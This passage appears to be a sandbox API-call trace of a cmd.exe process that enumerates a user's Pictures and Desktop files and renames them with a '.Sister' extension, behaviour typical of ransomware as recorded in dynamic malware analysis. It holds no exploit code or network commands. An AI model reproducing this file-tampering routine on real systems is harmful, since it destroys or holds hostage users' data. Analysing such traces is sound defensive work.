lpBuffer="C:\\Users\\FD1HVy\\Pictures\\tust f-S-Eq-29XvQ_R.png", lpFilePart=0xa6cf4fd660*="tust f-S-Eq-29XvQ_R.png") returned 0x30 [0293.972] SetErrorMode (uMode=0x0) returned 0x1 [0293.972] GetProcessHeap () returned 0x21ed8c70000 [0293.972] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9305a00 [0293.978] _wcsicmp (_String1="tust f-S-Eq-29XvQ_R.png", _String2=".") returned 70 [0293.978] _wcsicmp (_String1="tust f-S-Eq-29XvQ_R.png", _String2="..") returned 70 [0293.979] GetFileAttributesW (lpFileName="tust f-S-Eq-29XvQ_R.png" (normalized: "c:\\users\\fd1hvy\\pictures\\tust f-s-eq-29xvq_r.png")) returned 0x20 [0293.983] ??_V@YAXPEAX@Z () returned 0x1 [0293.983] malloc (_Size=0xffce) returned 0x21eda0c0080 [0293.983] ??_V@YAXPEAX@Z () returned 0x21eda0c0080 [0293.983] malloc (_Size=0xffce) returned 0x21eda0d0060 [0293.983] ??_V@YAXPEAX@Z () returned 0x21eda0d0060 [0293.983] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\tust f-S-Eq-29XvQ_R.png" (normalized: "c:\\users\\fd1hvy\\pictures\\tust f-s-eq-29xvq_r.png")) returned 0x20 [0293.983] malloc (_Size=0xffce) returned 0x21ed993f900 [0293.984] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0293.984] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\tust f-S-Eq-29XvQ_R.png", fInfoLevelId=0x1, lpFindFileData=0x21ed9302e30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9302e30) returned 0x21ed8cc7fc0 [0293.985] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0293.985] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0293.985] ??_V@YAXPEAX@Z () returned 0x1 [0293.985] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\tust f-S-Eq-29XvQ_R.png" (normalized: "c:\\users\\fd1hvy\\pictures\\tust f-s-eq-29xvq_r.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\tust f-S-Eq-29XvQ_R.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\tust f-s-eq-29xvq_r.png.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.986] FindNextFileW (in: hFindFile=0x21ed8cc7fc0, lpFindFileData=0x21ed9302e30 | out: lpFindFileData=0x21ed9302e30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fef870, ftCreationTime.dwHighDateTime=0x1d5e455, ftLastAccessTime.dwLowDateTime=0xb6eff3a0, ftLastAccessTime.dwHighDateTime=0x1d5f0c5, ftLastWriteTime.dwLowDateTime=0xb6eff3a0, ftLastWriteTime.dwHighDateTime=0x1d5f0c5, nFileSizeHigh=0x0, nFileSizeLow=0x10023, dwReserved0=0x0, dwReserved1=0x0, cFileName="tust f-S-Eq-29XvQ_R.png", cAlternateFileName="")) returned 0 [0293.986] GetLastError () returned 0x12 [0293.986] FindClose (in: hFindFile=0x21ed8cc7fc0 | out: hFindFile=0x21ed8cc7fc0) returned 1 [0293.987] ??_V@YAXPEAX@Z () returned 0x1 [0293.987] ??_V@YAXPEAX@Z () returned 0x1 [0293.987] ??_V@YAXPEAX@Z () returned 0x1 [0293.987] ??_V@YAXPEAX@Z () returned 0x1 [0293.987] GetProcessHeap () returned 0x21ed8c70000 [0293.987] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7660 [0293.987] GetProcessHeap () returned 0x21ed8c70000 [0293.987] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95aa0, Size=0x16) returned 0x21ed8c95840 [0293.987] GetProcessHeap () returned 0x21ed8c70000 [0293.987] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95840) returned 0x16 [0293.987] GetProcessHeap () returned 0x21ed8c70000 [0293.987] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e00, Size=0x20) returned 0x21ed8d45b60 [0293.988] GetProcessHeap () returned 0x21ed8c70000 [0293.988] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45b60) returned 0x20 [0293.988] GetProcessHeap () returned 0x21ed8c70000 [0293.988] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bf00 [0293.988] GetProcessHeap () returned 0x21ed8c70000 [0293.988] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bf00, Size=0xb2) returned 0x21ed937b330 [0293.988] GetProcessHeap () returned 0x21ed8c70000 [0293.988] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b330) returned 0xb2 [0293.988] GetProcessHeap () returned 0x21ed8c70000 [0293.988] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9367f30 [0293.988] GetProcessHeap () returned 0x21ed8c70000 [0293.988] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9367f30, Size=0x30) returned 0x21ed9367f30 [0293.988] GetProcessHeap () returned 0x21ed8c70000 [0293.988] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9367f30) returned 0x30 [0293.988] GetProcessHeap () returned 0x21ed8c70000 [0293.988] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9367f70 [0293.988] malloc (_Size=0x1ff9c) returned 0x21eda0c0080 [0293.989] GetProcessHeap () returned 0x21ed8c70000 [0293.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937b3f0 [0293.989] GetProcessHeap () returned 0x21ed8c70000 [0293.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937b630 [0293.989] ??_V@YAXPEAX@Z () returned 0x1 [0293.989] malloc (_Size=0x1ff9c) returned 0x21eda0c0080 [0293.989] GetProcessHeap () returned 0x21ed8c70000 [0293.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937bb70 [0293.989] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda0c0080, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.989] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c72890, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc76c0 [0293.989] FindClose (in: hFindFile=0x21ed8cc76c0 | out: hFindFile=0x21ed8cc76c0) returned 1 [0293.990] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c72890, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7c60 [0293.990] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0293.990] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c72890, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc84a0 [0293.990] FindClose (in: hFindFile=0x21ed8cc84a0 | out: hFindFile=0x21ed8cc84a0) returned 1 [0293.990] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c72890, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.990] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0293.990] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0293.990] GetProcessHeap () returned 0x21ed8c70000 [0293.990] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67430 [0293.990] ??_V@YAXPEAX@Z () returned 0x1 [0293.990] ??_V@YAXPEAX@Z () returned 0x1 [0293.990] GetProcessHeap () returned 0x21ed8c70000 [0293.990] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9367f70, Size=0x490) returned 0x21ed9367f70 [0293.990] GetProcessHeap () returned 0x21ed8c70000 [0293.991] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9367f70) returned 0x490 [0293.991] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.991] GetFileType (hFile=0x50) returned 0x2 [0293.991] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.991] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.992] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.999] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.999] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.999] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.999] GetFileType (hFile=0x50) returned 0x2 [0293.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.999] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0294.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.000] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0294.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.000] GetFileType (hFile=0x50) returned 0x2 [0294.000] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.000] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0294.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.001] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9367f40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9367f40*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0294.001] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0294.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.001] GetFileType (hFile=0x50) returned 0x2 [0294.001] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.002] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0294.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.002] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0294.007] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0294.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.007] GetFileType (hFile=0x50) returned 0x2 [0294.007] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.007] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0294.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.008] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0294.012] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0294.013] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0294.013] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0294.013] malloc (_Size=0xffce) returned 0x21eda0c0080 [0294.013] ??_V@YAXPEAX@Z () returned 0x21eda0c0080 [0294.013] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0294.013] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0294.013] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0294.013] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0294.013] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0294.013] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0294.013] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0294.013] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0294.013] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0294.013] ??_V@YAXPEAX@Z () returned 0x1 [0294.013] GetProcessHeap () returned 0x21ed8c70000 [0294.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f980 [0294.014] GetProcessHeap () returned 0x21ed8c70000 [0294.014] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f980, Size=0x130) returned 0x21ed8d56ce0 [0294.014] GetProcessHeap () returned 0x21ed8c70000 [0294.014] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56ce0) returned 0x130 [0294.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.014] malloc (_Size=0xffce) returned 0x21eda0c0080 [0294.014] ??_V@YAXPEAX@Z () returned 0x21eda0c0080 [0294.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.014] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda0c0080, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0294.021] ??_V@YAXPEAX@Z () returned 0x1 [0294.021] GetProcessHeap () returned 0x21ed8c70000 [0294.021] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d56e20 [0294.021] GetProcessHeap () returned 0x21ed8c70000 [0294.022] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f000 [0294.022] GetProcessHeap () returned 0x21ed8c70000 [0294.022] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f000, Size=0x130) returned 0x21ed8d2dcd0 [0294.022] GetProcessHeap () returned 0x21ed8c70000 [0294.022] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2dcd0) returned 0x130 [0294.022] malloc (_Size=0xffce) returned 0x21eda0c0080 [0294.022] ??_V@YAXPEAX@Z () returned 0x21eda0c0080 [0294.022] GetProcessHeap () returned 0x21ed8c70000 [0294.022] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7780 [0294.022] GetProcessHeap () returned 0x21ed8c70000 [0294.022] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9303f30 [0294.022] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0294.022] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0294.022] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0294.023] GetLastError () returned 0x2 [0294.023] GetProcessHeap () returned 0x21ed8c70000 [0294.023] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9368410 [0294.023] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9368420 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0294.023] SetErrorMode (uMode=0x0) returned 0x0 [0294.023] SetErrorMode (uMode=0x1) returned 0x0 [0294.023] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda0c0080, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0294.023] SetErrorMode (uMode=0x0) returned 0x1 [0294.023] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0294.023] GetProcessHeap () returned 0x21ed8c70000 [0294.023] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9305c70 [0294.023] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0294.023] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0294.024] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0294.024] GetLastError () returned 0x2 [0294.024] ??_V@YAXPEAX@Z () returned 0x1 [0294.024] malloc (_Size=0xffce) returned 0x21eda0c0080 [0294.024] ??_V@YAXPEAX@Z () returned 0x21eda0c0080 [0294.024] malloc (_Size=0xffce) returned 0x21eda0d0060 [0294.024] ??_V@YAXPEAX@Z () returned 0x21eda0d0060 [0294.024] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0294.024] GetLastError () returned 0x2 [0294.024] _get_osfhandle (_FileHandle=2) returned 0x54 [0294.024] GetFileType (hFile=0x54) returned 0x2 [0294.024] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0294.024] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0294.025] _get_osfhandle (_FileHandle=2) returned 0x54 [0294.025] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0294.025] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0294.025] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0294.025] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0294.031] longjmp () [0294.032] ??_V@YAXPEAX@Z () returned 0x1 [0294.032] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7fef00, ftCreationTime.dwHighDateTime=0x1d5ea2f, ftLastAccessTime.dwLowDateTime=0xb26a7550, ftLastAccessTime.dwHighDateTime=0x1d5eb50, ftLastWriteTime.dwLowDateTime=0xb26a7550, ftLastWriteTime.dwHighDateTime=0x1d5eb50, nFileSizeHigh=0x0, nFileSizeLow=0x115d2, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="v9e3P.bmp", cAlternateFileName="")) returned 1 [0294.032] GetProcessHeap () returned 0x21ed8c70000 [0294.032] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75940, Size=0x1e4) returned 0x21ed8c75940 [0294.032] GetProcessHeap () returned 0x21ed8c70000 [0294.032] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75940) returned 0x1e4 [0294.032] GetProcessHeap () returned 0x21ed8c70000 [0294.032] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9390070 [0294.033] GetProcessHeap () returned 0x21ed8c70000 [0294.033] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9390070, Size=0x30) returned 0x21ed9390070 [0294.033] GetProcessHeap () returned 0x21ed8c70000 [0294.033] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9390070) returned 0x30 [0294.033] GetProcessHeap () returned 0x21ed8c70000 [0294.033] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93900b0 [0294.033] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0294.033] GetProcessHeap () returned 0x21ed8c70000 [0294.033] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45e00 [0294.033] ??_V@YAXPEAX@Z () returned 0x1 [0294.033] GetProcessHeap () returned 0x21ed8c70000 [0294.033] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93900b0, Size=0x110) returned 0x21ed93900b0 [0294.033] GetProcessHeap () returned 0x21ed8c70000 [0294.033] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93900b0) returned 0x110 [0294.034] GetProcessHeap () returned 0x21ed8c70000 [0294.034] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93901d0 [0294.034] GetProcessHeap () returned 0x21ed8c70000 [0294.034] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93901d0, Size=0x290) returned 0x21ed93901d0 [0294.034] GetProcessHeap () returned 0x21ed8c70000 [0294.034] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93901d0) returned 0x290 [0294.034] GetProcessHeap () returned 0x21ed8c70000 [0294.034] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9390470 [0294.034] GetProcessHeap () returned 0x21ed8c70000 [0294.034] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9390470, Size=0x30) returned 0x21ed9390470 [0294.034] GetProcessHeap () returned 0x21ed8c70000 [0294.034] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9390470) returned 0x30 [0294.034] GetProcessHeap () returned 0x21ed8c70000 [0294.034] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93904b0 [0294.034] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0294.034] GetProcessHeap () returned 0x21ed8c70000 [0294.034] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45e30 [0294.035] ??_V@YAXPEAX@Z () returned 0x1 [0294.035] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0294.035] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7a80 [0294.035] FindClose (in: hFindFile=0x21ed8cc7a80 | out: hFindFile=0x21ed8cc7a80) returned 1 [0294.035] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: 